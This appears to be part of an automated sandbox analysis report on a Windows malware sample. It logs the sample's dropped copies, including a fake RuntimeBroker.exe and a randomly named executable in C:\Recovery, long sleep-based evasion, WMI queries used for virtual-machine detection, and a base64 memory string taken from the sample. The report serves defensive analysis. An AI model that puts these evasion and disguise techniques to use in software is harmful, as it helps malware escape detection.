Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 8056 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7176 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Downloads\RuntimeBroker.exe TID: 7624 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 3052 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 3872 Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -600000s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -599853s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7676 Thread sleep time: -21600000s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -598907s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -598203s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -598000s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -597719s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -597563s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -597344s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -597094s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -596938s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -596766s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -596640s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -596531s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -596422s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -596259s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -596107s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7676 Thread sleep time: -600000s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -595954s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -595828s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -595719s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -595580s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -595438s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -595266s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -595140s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -595014s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -594906s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -594797s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -594688s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -594563s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -594438s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -594313s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -594198s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -594078s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -593969s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -593844s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -593735s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -593610s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -593485s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -593360s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -593250s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -593141s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -592985s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -592846s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -592719s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -592610s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -592485s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -592375s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -592266s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -592157s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -592032s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -591903s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -591797s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -591688s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -591578s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -591468s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -591360s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -591235s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -591110s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1984 Thread sleep time: -30000s >= -30000s
Source: C:\Users\Public\Downloads\RuntimeBroker.exe TID: 1196 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 8 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Downloads\RuntimeBroker.exe TID: 7500 Thread sleep time: -922337203685477s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Downloads\RuntimeBroker.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Downloads\RuntimeBroker.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Downloads\RuntimeBroker.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 599890 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 599671 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 599562 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 599453 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 99883 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 99766 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 99657 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 99544 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 99422 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 99313 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 99199 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 99084 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 98954 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 98829 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 98704 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 98579 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 98454 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 98329 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 98204 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 98094 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 97954 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 597229 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 597094 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 596969 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 596794 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 596617 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 30000
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 600000
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 599853
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 3600000
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 598907
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 598203
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 598000
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 597719
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 597563
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 597344
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 597094
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596938
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596766
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596640
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596531
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596422
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596259
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596107
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 300000
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595954
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595828
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595719
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595580
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595438
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595266
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595140
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595014
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594906
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594797
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594688
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594563
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594438
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594313
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594198
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594078
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593969
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593844
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593735
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593610
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593485
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593360
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593250
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593141
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592985
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592846
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592719
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592610
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592485
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592375
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592266
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592157
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592032
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591903
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591797
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591688
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591578
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591468
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591360
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591235
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591110
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: W4tW72sfAD.exe, 00000000.00000002.1766850936.000000001B9CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: W4tW72sfAD.exe, juptXkyeRvGsIZrQGeVEsrnWhD.exe0.0.dr Binary or memory string: EE8hgfsJKrIo2qFkM8q
Source: juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2590137351.000000001347E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ahUIjoAYzyQSo/qBDk6lKAXBI8BsAaYAlr7t6agxG0DUK3kAGtflh4dGk5lq8hwLueGmhiOxqPD0S7wu0G2OjnIoOI0MEblNyT69AmGtaa3whIwOLx2ZHhtHzlw285YYojSwHWj/cn42iFYIpAxlbICCowO50qCvQIbbb19sC+lmy2haDc6b6A3kSY0a+Oc4i4Ek1t6mBjLtkXT0B5Ix17TF6nhFFHtq2hKJLI+xiE9VqcGk/g0HCNG/WPQYBw6HR8ZGBjtGRpOG72xPBndOpjKgJtksABqRGZq0shke43bcj23+US6M5HekYSK6zMgZVmeTCewNklO8jkjo9eBdwB0fsZwxgxbCkYDhrmiP7oVCtLfmxnjlaHxxN7IGJ60MtEPw0HKs52YMXpwyre7YFVMDGfIw4whhmqkBkExW9u7HSrJUvwBE9En7aK+bSA5zNp2Amgn5wCThZmEpfmjbXBHMp0aRK28iiPpNOJQqxwU/WxDKgXqcWSx9B0JfII3QPZhGLEdiTX4Z8MMV0Y8Fr80PXLx6lXR1RBT+NNLh1b2N+3a2Lq1tXekf+2y5hFqEu/PNSnucmB+yeEkmOquRGs6HR39hI9yV9majg5tGyWLorkGutqY27hRQA2HRqk9XIExmKMsNdTTdslIFGcvw83b49BKpNsGhgBOjS2Mxc5RNhbsiyZCTX2NviatuckXivc2+cKhxl4fhEDNzeFYMKE1NI+zseZotDnWEOz1JeJ9MV+osTHoC/f1Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
